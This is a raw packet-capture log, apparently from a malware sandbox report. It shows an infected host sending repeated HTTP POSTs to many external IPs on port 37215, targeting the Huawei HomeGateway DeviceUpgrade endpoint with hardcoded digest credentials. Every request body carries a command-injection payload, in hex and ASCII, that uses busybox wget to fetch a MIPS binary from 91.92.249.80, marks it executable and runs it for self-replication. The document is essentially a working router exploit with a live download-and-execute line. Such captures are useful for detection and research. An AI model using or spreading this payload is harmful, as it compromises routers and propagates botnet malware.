                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          226192.168.2.2352176202.53.163.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.153517962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          227192.168.2.236053296.16.251.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.153553009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          228192.168.2.2356900197.35.89.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.153846025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          229192.168.2.234683841.36.124.7737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154046059 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          230192.168.2.2342698111.56.6.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154058933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          231192.168.2.233749841.61.78.9337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154058933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          232192.168.2.2336374104.28.93.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154330015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          233192.168.2.234090641.22.202.7737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154334068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          234192.168.2.235210672.241.122.737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154334068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          235192.168.2.234320641.59.14.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154607058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          236192.168.2.234598241.77.26.13637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154628992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
